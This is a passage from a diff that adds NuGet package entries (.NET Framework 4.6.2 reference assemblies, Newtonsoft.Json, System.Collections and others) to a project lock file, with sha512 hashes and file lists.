"build/.NETFramework/v4.6.2/System.Data.Entity.Design.xml", + "build/.NETFramework/v4.6.2/System.Data.Entity.dll", + "build/.NETFramework/v4.6.2/System.Data.Entity.xml", + "build/.NETFramework/v4.6.2/System.Data.Linq.dll", + "build/.NETFramework/v4.6.2/System.Data.Linq.xml", + "build/.NETFramework/v4.6.2/System.Data.OracleClient.dll", + "build/.NETFramework/v4.6.2/System.Data.OracleClient.xml", + "build/.NETFramework/v4.6.2/System.Data.Services.Client.dll", + "build/.NETFramework/v4.6.2/System.Data.Services.Client.xml", + "build/.NETFramework/v4.6.2/System.Data.Services.Design.dll", + "build/.NETFramework/v4.6.2/System.Data.Services.Design.xml", + "build/.NETFramework/v4.6.2/System.Data.Services.dll", + "build/.NETFramework/v4.6.2/System.Data.Services.xml", + "build/.NETFramework/v4.6.2/System.Data.SqlXml.dll", + "build/.NETFramework/v4.6.2/System.Data.SqlXml.xml", + "build/.NETFramework/v4.6.2/System.Data.dll", + "build/.NETFramework/v4.6.2/System.Data.xml", + "build/.NETFramework/v4.6.2/System.Deployment.dll", + "build/.NETFramework/v4.6.2/System.Deployment.xml", + "build/.NETFramework/v4.6.2/System.Design.dll", + "build/.NETFramework/v4.6.2/System.Design.xml", + "build/.NETFramework/v4.6.2/System.Device.dll", + "build/.NETFramework/v4.6.2/System.Device.xml", + "build/.NETFramework/v4.6.2/System.DirectoryServices.AccountManagement.dll", + "build/.NETFramework/v4.6.2/System.DirectoryServices.AccountManagement.xml", + "build/.NETFramework/v4.6.2/System.DirectoryServices.Protocols.dll", + "build/.NETFramework/v4.6.2/System.DirectoryServices.Protocols.xml", + "build/.NETFramework/v4.6.2/System.DirectoryServices.dll", + "build/.NETFramework/v4.6.2/System.DirectoryServices.xml", + "build/.NETFramework/v4.6.2/System.Drawing.Design.dll", + "build/.NETFramework/v4.6.2/System.Drawing.Design.xml", + "build/.NETFramework/v4.6.2/System.Drawing.dll", + "build/.NETFramework/v4.6.2/System.Drawing.xml", + "build/.NETFramework/v4.6.2/System.Dynamic.dll", + "build/.NETFramework/v4.6.2/System.EnterpriseServices.Thunk.dll", + "build/.NETFramework/v4.6.2/System.EnterpriseServices.Wrapper.dll", + "build/.NETFramework/v4.6.2/System.EnterpriseServices.dll", + "build/.NETFramework/v4.6.2/System.EnterpriseServices.xml", + "build/.NETFramework/v4.6.2/System.IO.Compression.FileSystem.dll", + "build/.NETFramework/v4.6.2/System.IO.Compression.FileSystem.xml", + "build/.NETFramework/v4.6.2/System.IO.Compression.dll", + "build/.NETFramework/v4.6.2/System.IO.Compression.xml", + "build/.NETFramework/v4.6.2/System.IO.Log.dll", + "build/.NETFramework/v4.6.2/System.IO.Log.xml", + "build/.NETFramework/v4.6.2/System.IdentityModel.Selectors.dll", + "build/.NETFramework/v4.6.2/System.IdentityModel.Selectors.xml", + "build/.NETFramework/v4.6.2/System.IdentityModel.Services.dll", + "build/.NETFramework/v4.6.2/System.IdentityModel.Services.xml", + "build/.NETFramework/v4.6.2/System.IdentityModel.dll", + "build/.NETFramework/v4.6.2/System.IdentityModel.xml", + "build/.NETFramework/v4.6.2/System.Linq.xml", + "build/.NETFramework/v4.6.2/System.Management.Instrumentation.dll", + "build/.NETFramework/v4.6.2/System.Management.Instrumentation.xml", + "build/.NETFramework/v4.6.2/System.Management.dll", + "build/.NETFramework/v4.6.2/System.Management.xml", + "build/.NETFramework/v4.6.2/System.Messaging.dll", + "build/.NETFramework/v4.6.2/System.Messaging.xml", + "build/.NETFramework/v4.6.2/System.Net.Http.WebRequest.dll", + "build/.NETFramework/v4.6.2/System.Net.Http.WebRequest.xml", + "build/.NETFramework/v4.6.2/System.Net.Http.dll", + "build/.NETFramework/v4.6.2/System.Net.Http.xml", + "build/.NETFramework/v4.6.2/System.Net.dll", + "build/.NETFramework/v4.6.2/System.Net.xml", + "build/.NETFramework/v4.6.2/System.Numerics.dll", + "build/.NETFramework/v4.6.2/System.Numerics.xml", + "build/.NETFramework/v4.6.2/System.Printing.dll", + "build/.NETFramework/v4.6.2/System.Printing.xml", + "build/.NETFramework/v4.6.2/System.Reflection.Context.dll", + "build/.NETFramework/v4.6.2/System.Reflection.Context.xml", + "build/.NETFramework/v4.6.2/System.Runtime.Caching.dll", + "build/.NETFramework/v4.6.2/System.Runtime.Caching.xml", + "build/.NETFramework/v4.6.2/System.Runtime.DurableInstancing.dll", + "build/.NETFramework/v4.6.2/System.Runtime.DurableInstancing.xml", + "build/.NETFramework/v4.6.2/System.Runtime.Remoting.dll", + "build/.NETFramework/v4.6.2/System.Runtime.Remoting.xml", + "build/.NETFramework/v4.6.2/System.Runtime.Serialization.Formatters.Soap.dll", + "build/.NETFramework/v4.6.2/System.Runtime.Serialization.Formatters.Soap.xml", + "build/.NETFramework/v4.6.2/System.Runtime.Serialization.dll", + "build/.NETFramework/v4.6.2/System.Runtime.Serialization.xml", + "build/.NETFramework/v4.6.2/System.Security.dll", + "build/.NETFramework/v4.6.2/System.Security.xml", + "build/.NETFramework/v4.6.2/System.ServiceModel.Activation.dll", + "build/.NETFramework/v4.6.2/System.ServiceModel.Activation.xml", + "build/.NETFramework/v4.6.2/System.ServiceModel.Activities.dll", + "build/.NETFramework/v4.6.2/System.ServiceModel.Activities.xml", + "build/.NETFramework/v4.6.2/System.ServiceModel.Channels.dll", + "build/.NETFramework/v4.6.2/System.ServiceModel.Channels.xml", + "build/.NETFramework/v4.6.2/System.ServiceModel.Discovery.dll", + "build/.NETFramework/v4.6.2/System.ServiceModel.Discovery.xml", + "build/.NETFramework/v4.6.2/System.ServiceModel.Routing.dll", + "build/.NETFramework/v4.6.2/System.ServiceModel.Routing.xml", + "build/.NETFramework/v4.6.2/System.ServiceModel.Web.dll", + "build/.NETFramework/v4.6.2/System.ServiceModel.Web.xml", + "build/.NETFramework/v4.6.2/System.ServiceModel.dll", + "build/.NETFramework/v4.6.2/System.ServiceModel.xml", + "build/.NETFramework/v4.6.2/System.ServiceProcess.dll", + "build/.NETFramework/v4.6.2/System.ServiceProcess.xml", + "build/.NETFramework/v4.6.2/System.Speech.dll", + "build/.NETFramework/v4.6.2/System.Speech.xml", + "build/.NETFramework/v4.6.2/System.Threading.Tasks.Dataflow.xml", + "build/.NETFramework/v4.6.2/System.Transactions.dll", + "build/.NETFramework/v4.6.2/System.Transactions.xml", + "build/.NETFramework/v4.6.2/System.Web.Abstractions.dll", + "build/.NETFramework/v4.6.2/System.Web.ApplicationServices.dll", + "build/.NETFramework/v4.6.2/System.Web.ApplicationServices.xml", + "build/.NETFramework/v4.6.2/System.Web.DataVisualization.Design.dll", + "build/.NETFramework/v4.6.2/System.Web.DataVisualization.dll", + "build/.NETFramework/v4.6.2/System.Web.DataVisualization.xml", + "build/.NETFramework/v4.6.2/System.Web.DynamicData.Design.dll", + "build/.NETFramework/v4.6.2/System.Web.DynamicData.Design.xml", + "build/.NETFramework/v4.6.2/System.Web.DynamicData.dll", + "build/.NETFramework/v4.6.2/System.Web.DynamicData.xml", + "build/.NETFramework/v4.6.2/System.Web.Entity.Design.dll", + "build/.NETFramework/v4.6.2/System.Web.Entity.Design.xml", + "build/.NETFramework/v4.6.2/System.Web.Entity.dll", + "build/.NETFramework/v4.6.2/System.Web.Entity.xml", + "build/.NETFramework/v4.6.2/System.Web.Extensions.Design.dll", + "build/.NETFramework/v4.6.2/System.Web.Extensions.Design.xml", + "build/.NETFramework/v4.6.2/System.Web.Extensions.dll", + "build/.NETFramework/v4.6.2/System.Web.Extensions.xml", + "build/.NETFramework/v4.6.2/System.Web.Mobile.dll", + "build/.NETFramework/v4.6.2/System.Web.Mobile.xml", + "build/.NETFramework/v4.6.2/System.Web.RegularExpressions.dll", + "build/.NETFramework/v4.6.2/System.Web.RegularExpressions.xml", + "build/.NETFramework/v4.6.2/System.Web.Routing.dll", + "build/.NETFramework/v4.6.2/System.Web.Services.dll", + "build/.NETFramework/v4.6.2/System.Web.Services.xml", + "build/.NETFramework/v4.6.2/System.Web.dll", + "build/.NETFramework/v4.6.2/System.Web.xml", + "build/.NETFramework/v4.6.2/System.Windows.Controls.Ribbon.dll", + "build/.NETFramework/v4.6.2/System.Windows.Controls.Ribbon.xml", + "build/.NETFramework/v4.6.2/System.Windows.Forms.DataVisualization.Design.dll", + "build/.NETFramework/v4.6.2/System.Windows.Forms.DataVisualization.dll", + "build/.NETFramework/v4.6.2/System.Windows.Forms.DataVisualization.xml", + "build/.NETFramework/v4.6.2/System.Windows.Forms.dll", + "build/.NETFramework/v4.6.2/System.Windows.Forms.xml", + "build/.NETFramework/v4.6.2/System.Windows.Input.Manipulations.dll", + "build/.NETFramework/v4.6.2/System.Windows.Input.Manipulations.xml", + "build/.NETFramework/v4.6.2/System.Windows.Presentation.dll", + "build/.NETFramework/v4.6.2/System.Windows.Presentation.xml", + "build/.NETFramework/v4.6.2/System.Windows.dll", + "build/.NETFramework/v4.6.2/System.Workflow.Activities.dll", + "build/.NETFramework/v4.6.2/System.Workflow.Activities.xml", + "build/.NETFramework/v4.6.2/System.Workflow.ComponentModel.dll", + "build/.NETFramework/v4.6.2/System.Workflow.ComponentModel.xml", + "build/.NETFramework/v4.6.2/System.Workflow.Runtime.dll", + "build/.NETFramework/v4.6.2/System.Workflow.Runtime.xml", + "build/.NETFramework/v4.6.2/System.WorkflowServices.dll", + "build/.NETFramework/v4.6.2/System.WorkflowServices.xml", + "build/.NETFramework/v4.6.2/System.Xaml.dll", + "build/.NETFramework/v4.6.2/System.Xaml.xml", + "build/.NETFramework/v4.6.2/System.Xml.Linq.dll", + "build/.NETFramework/v4.6.2/System.Xml.Linq.xml", + "build/.NETFramework/v4.6.2/System.Xml.Serialization.dll", + "build/.NETFramework/v4.6.2/System.Xml.dll", + "build/.NETFramework/v4.6.2/System.Xml.xml", + "build/.NETFramework/v4.6.2/System.dll", + "build/.NETFramework/v4.6.2/System.xml", + "build/.NETFramework/v4.6.2/UIAutomationClient.dll", + "build/.NETFramework/v4.6.2/UIAutomationClient.xml", + "build/.NETFramework/v4.6.2/UIAutomationClientsideProviders.dll", + "build/.NETFramework/v4.6.2/UIAutomationClientsideProviders.xml", + "build/.NETFramework/v4.6.2/UIAutomationProvider.dll", + "build/.NETFramework/v4.6.2/UIAutomationProvider.xml", + "build/.NETFramework/v4.6.2/UIAutomationTypes.dll", + "build/.NETFramework/v4.6.2/UIAutomationTypes.xml", + "build/.NETFramework/v4.6.2/WindowsBase.dll", + "build/.NETFramework/v4.6.2/WindowsBase.xml", + "build/.NETFramework/v4.6.2/WindowsFormsIntegration.dll", + "build/.NETFramework/v4.6.2/WindowsFormsIntegration.xml", + "build/.NETFramework/v4.6.2/XamlBuildTask.dll", + "build/.NETFramework/v4.6.2/XamlBuildTask.xml", + "build/.NETFramework/v4.6.2/mscorlib.dll", + "build/.NETFramework/v4.6.2/mscorlib.xml", + "build/.NETFramework/v4.6.2/namespaces.xml", + "build/.NETFramework/v4.6.2/sysglobl.dll", + "build/.NETFramework/v4.6.2/sysglobl.xml", + "build/Microsoft.NETFramework.ReferenceAssemblies.net462.targets", + "microsoft.netframework.referenceassemblies.net462.1.0.3.nupkg.sha512", + "microsoft.netframework.referenceassemblies.net462.nuspec" + ] + }, + "Microsoft.Win32.Primitives/4.3.0": { + "sha512": "9ZQKCWxH7Ijp9BfahvL2Zyf1cJIk8XYLF6Yjzr2yi0b2cOut/HQ31qf1ThHAgCc3WiZMdnWcfJCgN82/0UunxA==", + "type": "package", + "path": "microsoft.win32.primitives/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/Microsoft.Win32.Primitives.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "microsoft.win32.primitives.4.3.0.nupkg.sha512", + "microsoft.win32.primitives.nuspec", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/Microsoft.Win32.Primitives.dll", + "ref/netstandard1.3/Microsoft.Win32.Primitives.dll", + "ref/netstandard1.3/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/de/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/es/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/fr/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/it/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/ja/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/ko/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/ru/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/zh-hans/Microsoft.Win32.Primitives.xml", + "ref/netstandard1.3/zh-hant/Microsoft.Win32.Primitives.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._" + ] + }, + "NETStandard.Library/1.6.1": { + "sha512": "WcSp3+vP+yHNgS8EV5J7pZ9IRpeDuARBPN28by8zqff1wJQXm26PVU8L3/fYLBJVU7BtDyqNVWq2KlCVvSSR4A==", + "type": "package", + "path": "netstandard.library/1.6.1", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "netstandard.library.1.6.1.nupkg.sha512", + "netstandard.library.nuspec" + ] + }, + "Newtonsoft.Json/13.0.3": { + "sha512": "HrC5BXdl00IP9zeV+0Z848QWPAoCr9P3bDEZguI+gkLcBKAOxix/tLEAAHC+UvDNPv4a2d18lOReHMOagPa+zQ==", + "type": "package", + "path": "newtonsoft.json/13.0.3", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "LICENSE.md", + "README.md", + "lib/net20/Newtonsoft.Json.dll", + "lib/net20/Newtonsoft.Json.xml", + "lib/net35/Newtonsoft.Json.dll", + "lib/net35/Newtonsoft.Json.xml", + "lib/net40/Newtonsoft.Json.dll", + "lib/net40/Newtonsoft.Json.xml", + "lib/net45/Newtonsoft.Json.dll", + "lib/net45/Newtonsoft.Json.xml", + "lib/net6.0/Newtonsoft.Json.dll", + "lib/net6.0/Newtonsoft.Json.xml", + "lib/netstandard1.0/Newtonsoft.Json.dll", + "lib/netstandard1.0/Newtonsoft.Json.xml", + "lib/netstandard1.3/Newtonsoft.Json.dll", + "lib/netstandard1.3/Newtonsoft.Json.xml", + "lib/netstandard2.0/Newtonsoft.Json.dll", + "lib/netstandard2.0/Newtonsoft.Json.xml", + "newtonsoft.json.13.0.3.nupkg.sha512", + "newtonsoft.json.nuspec", + "packageIcon.png" + ] + }, + "System.AppContext/4.3.0": { + "sha512": "fKC+rmaLfeIzUhagxY17Q9siv/sPrjjKcfNg1Ic8IlQkZLipo8ljcaZQu4VtI4Jqbzjc2VTjzGLF6WmsRXAEgA==", + "type": "package", + "path": "system.appcontext/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.AppContext.dll", + "lib/net463/System.AppContext.dll", + "lib/netcore50/System.AppContext.dll", + "lib/netstandard1.6/System.AppContext.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.AppContext.dll", + "ref/net463/System.AppContext.dll", + "ref/netstandard/_._", + "ref/netstandard1.3/System.AppContext.dll", + "ref/netstandard1.3/System.AppContext.xml", + "ref/netstandard1.3/de/System.AppContext.xml", + "ref/netstandard1.3/es/System.AppContext.xml", + "ref/netstandard1.3/fr/System.AppContext.xml", + "ref/netstandard1.3/it/System.AppContext.xml", + "ref/netstandard1.3/ja/System.AppContext.xml", + "ref/netstandard1.3/ko/System.AppContext.xml", + "ref/netstandard1.3/ru/System.AppContext.xml", + "ref/netstandard1.3/zh-hans/System.AppContext.xml", + "ref/netstandard1.3/zh-hant/System.AppContext.xml", + "ref/netstandard1.6/System.AppContext.dll", + "ref/netstandard1.6/System.AppContext.xml", + "ref/netstandard1.6/de/System.AppContext.xml", + "ref/netstandard1.6/es/System.AppContext.xml", + "ref/netstandard1.6/fr/System.AppContext.xml", + "ref/netstandard1.6/it/System.AppContext.xml", + "ref/netstandard1.6/ja/System.AppContext.xml", + "ref/netstandard1.6/ko/System.AppContext.xml", + "ref/netstandard1.6/ru/System.AppContext.xml", + "ref/netstandard1.6/zh-hans/System.AppContext.xml", + "ref/netstandard1.6/zh-hant/System.AppContext.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/aot/lib/netcore50/System.AppContext.dll", + "system.appcontext.4.3.0.nupkg.sha512", + "system.appcontext.nuspec" + ] + }, + "System.Collections/4.3.0": { + "sha512": "3Dcj85/TBdVpL5Zr+gEEBUuFe2icOnLalmEh9hfck1PTYbbyWuZgh4fmm2ysCLTrqLQw6t3TgTyJ+VLp+Qb+Lw==", + "type": "package", + "path": "system.collections/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Collections.dll", + "ref/netcore50/System.Collections.xml", + "ref/netcore50/de/System.Collections.xml", + "ref/netcore50/es/System.Collections.xml", + "ref/netcore50/fr/System.Collections.xml", + "ref/netcore50/it/System.Collections.xml", + "ref/netcore50/ja/System.Collections.xml", + "ref/netcore50/ko/System.Collections.xml", + "ref/netcore50/ru/System.Collections.xml", + "ref/netcore50/zh-hans/System.Collections.xml", + "ref/netcore50/zh-hant/System.Collections.xml", + "ref/netstandard1.0/System.Collections.dll", + "ref/netstandard1.0/System.Collections.xml", + "ref/netstandard1.0/de/System.Collections.xml", + "ref/netstandard1.0/es/System.Collections.xml", + "ref/netstandard1.0/fr/System.Collections.xml", + "ref/netstandard1.0/it/System.Collections.xml", + "ref/netstandard1.0/ja/System.Collections.xml", + "ref/netstandard1.0/ko/System.Collections.xml", + "ref/netstandard1.0/ru/System.Collections.xml", + "ref/netstandard1.0/zh-hans/System.Collections.xml", + "ref/netstandard1.0/zh-hant/System.Collections.xml", + "ref/netstandard1.3/System.Collections.dll", + "ref/netstandard1.3/System.Collections.xml", + "ref/netstandard1.3/de/System.Collections.xml", + "ref/netstandard1.3/es/System.Collections.xml", + "ref/netstandard1.3/fr/System.Collections.xml", + "ref/netstandard1.3/it/System.Collections.xml", + "ref/netstandard1.3/ja/System.Collections.xml", + "ref/netstandard1.3/ko/System.Collections.xml", + "ref/netstandard1.3/ru/System.Collections.xml", + "ref/netstandard1.3/zh-hans/System.Collections.xml", + "ref/netstandard1.3/zh-hant/System.Collections.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.collections.4.3.0.nupkg.sha512", + "system.collections.nuspec" + ] + }, + "System.Collections.Concurrent/4.3.0": { + "sha512": "ztl69Xp0Y/UXCL+3v3tEU+lIy+bvjKNUmopn1wep/a291pVPK7dxBd6T7WnlQqRog+d1a/hSsgRsmFnIBKTPLQ==", + "type": "package", + "path": "system.collections.concurrent/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/netcore50/System.Collections.Concurrent.dll", + "lib/netstandard1.3/System.Collections.Concurrent.dll", + "lib/portable-net45+win8+wpa81/_._", + "lib/win8/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Collections.Concurrent.dll", + "ref/netcore50/System.Collections.Concurrent.xml", + "ref/netcore50/de/System.Collections.Concurrent.xml", + "ref/netcore50/es/System.Collections.Concurrent.xml", + "ref/netcore50/fr/System.Collections.Concurrent.xml", + "ref/netcore50/it/System.Collections.Concurrent.xml", + "ref/netcore50/ja/System.Collections.Concurrent.xml", + "ref/netcore50/ko/System.Collections.Concurrent.xml", + "ref/netcore50/ru/System.Collections.Concurrent.xml", + "ref/netcore50/zh-hans/System.Collections.Concurrent.xml", + "ref/netcore50/zh-hant/System.Collections.Concurrent.xml", + "ref/netstandard1.1/System.Collections.Concurrent.dll", + "ref/netstandard1.1/System.Collections.Concurrent.xml", + "ref/netstandard1.1/de/System.Collections.Concurrent.xml", + "ref/netstandard1.1/es/System.Collections.Concurrent.xml", + "ref/netstandard1.1/fr/System.Collections.Concurrent.xml", + "ref/netstandard1.1/it/System.Collections.Concurrent.xml", + "ref/netstandard1.1/ja/System.Collections.Concurrent.xml", + "ref/netstandard1.1/ko/System.Collections.Concurrent.xml", + "ref/netstandard1.1/ru/System.Collections.Concurrent.xml", + "ref/netstandard1.1/zh-hans/System.Collections.Concurrent.xml", + "ref/netstandard1.1/zh-hant/System.Collections.Concurrent.xml", + "ref/netstandard1.3/System.Collections.Concurrent.dll", + "ref/netstandard1.3/System.Collections.Concurrent.xml", + "ref/netstandard1.3/de/System.Collections.Concurrent.xml", + "ref/netstandard1.3/es/System.Collections.Concurrent.xml", + "ref/netstandard1.3/fr/System.Collections.Concurrent.xml", + "ref/netstandard1.3/it/System.Collections.Concurrent.xml", + "ref/netstandard1.3/ja/System.Collections.Concurrent.xml", + "ref/netstandard1.3/ko/System.Collections.Concurrent.xml", + "ref/netstandard1.3/ru/System.Collections.Concurrent.xml", + "ref/netstandard1.3/zh-hans/System.Collections.Concurrent.xml", + "ref/netstandard1.3/zh-hant/System.Collections.Concurrent.xml", + "ref/portable-net45+win8+wpa81/_._", + "ref/win8/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.collections.concurrent.4.3.0.nupkg.sha512", + "system.collections.concurrent.nuspec" + ] + }, + "System.Console/4.3.0": { + "sha512": "DHDrIxiqk1h03m6khKWV2X8p/uvN79rgSqpilL6uzpmSfxfU5ng8VcPtW4qsDsQDHiTv6IPV9TmD5M/vElPNLg==", + "type": "package", + "path": "system.console/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.Console.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.Console.dll", + "ref/netstandard1.3/System.Console.dll", + "ref/netstandard1.3/System.Console.xml", + "ref/netstandard1.3/de/System.Console.xml", + "ref/netstandard1.3/es/System.Console.xml", + "ref/netstandard1.3/fr/System.Console.xml", + "ref/netstandard1.3/it/System.Console.xml", + "ref/netstandard1.3/ja/System.Console.xml", + "ref/netstandard1.3/ko/System.Console.xml", + "ref/netstandard1.3/ru/System.Console.xml", + "ref/netstandard1.3/zh-hans/System.Console.xml", + "ref/netstandard1.3/zh-hant/System.Console.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.console.4.3.0.nupkg.sha512", + "system.console.nuspec" + ] + }, + "System.Diagnostics.Debug/4.3.0": { + "sha512": "ZUhUOdqmaG5Jk3Xdb8xi5kIyQYAA4PnTNlHx1mu9ZY3qv4ELIdKbnL/akbGaKi2RnNUWaZsAs31rvzFdewTj2g==", + "type": "package", + "path": "system.diagnostics.debug/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Diagnostics.Debug.dll", + "ref/netcore50/System.Diagnostics.Debug.xml", + "ref/netcore50/de/System.Diagnostics.Debug.xml", + "ref/netcore50/es/System.Diagnostics.Debug.xml", + "ref/netcore50/fr/System.Diagnostics.Debug.xml", + "ref/netcore50/it/System.Diagnostics.Debug.xml", + "ref/netcore50/ja/System.Diagnostics.Debug.xml", + "ref/netcore50/ko/System.Diagnostics.Debug.xml", + "ref/netcore50/ru/System.Diagnostics.Debug.xml", + "ref/netcore50/zh-hans/System.Diagnostics.Debug.xml", + "ref/netcore50/zh-hant/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/System.Diagnostics.Debug.dll", + "ref/netstandard1.0/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/de/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/es/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/fr/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/it/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/ja/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/ko/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/ru/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/zh-hans/System.Diagnostics.Debug.xml", + "ref/netstandard1.0/zh-hant/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/System.Diagnostics.Debug.dll", + "ref/netstandard1.3/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/de/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/es/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/fr/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/it/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/ja/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/ko/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/ru/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/zh-hans/System.Diagnostics.Debug.xml", + "ref/netstandard1.3/zh-hant/System.Diagnostics.Debug.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.diagnostics.debug.4.3.0.nupkg.sha512", + "system.diagnostics.debug.nuspec" + ] + }, + "System.Diagnostics.DiagnosticSource/4.3.0": { + "sha512": "tD6kosZnTAGdrEa0tZSuFyunMbt/5KYDnHdndJYGqZoNy00XVXyACd5d6KnE1YgYv3ne2CjtAfNXo/fwEhnKUA==", + "type": "package", + "path": "system.diagnostics.diagnosticsource/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/net46/System.Diagnostics.DiagnosticSource.dll", + "lib/net46/System.Diagnostics.DiagnosticSource.xml", + "lib/netstandard1.1/System.Diagnostics.DiagnosticSource.dll", + "lib/netstandard1.1/System.Diagnostics.DiagnosticSource.xml", + "lib/netstandard1.3/System.Diagnostics.DiagnosticSource.dll", + "lib/netstandard1.3/System.Diagnostics.DiagnosticSource.xml", + "lib/portable-net45+win8+wpa81/System.Diagnostics.DiagnosticSource.dll", + "lib/portable-net45+win8+wpa81/System.Diagnostics.DiagnosticSource.xml", + "system.diagnostics.diagnosticsource.4.3.0.nupkg.sha512", + "system.diagnostics.diagnosticsource.nuspec" + ] + }, + "System.Diagnostics.Tools/4.3.0": { + "sha512": "UUvkJfSYJMM6x527dJg2VyWPSRqIVB0Z7dbjHst1zmwTXz5CcXSYJFWRpuigfbO1Lf7yfZiIaEUesfnl/g5EyA==", + "type": "package", + "path": "system.diagnostics.tools/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Diagnostics.Tools.dll", + "ref/netcore50/System.Diagnostics.Tools.xml", + "ref/netcore50/de/System.Diagnostics.Tools.xml", + "ref/netcore50/es/System.Diagnostics.Tools.xml", + "ref/netcore50/fr/System.Diagnostics.Tools.xml", + "ref/netcore50/it/System.Diagnostics.Tools.xml", + "ref/netcore50/ja/System.Diagnostics.Tools.xml", + 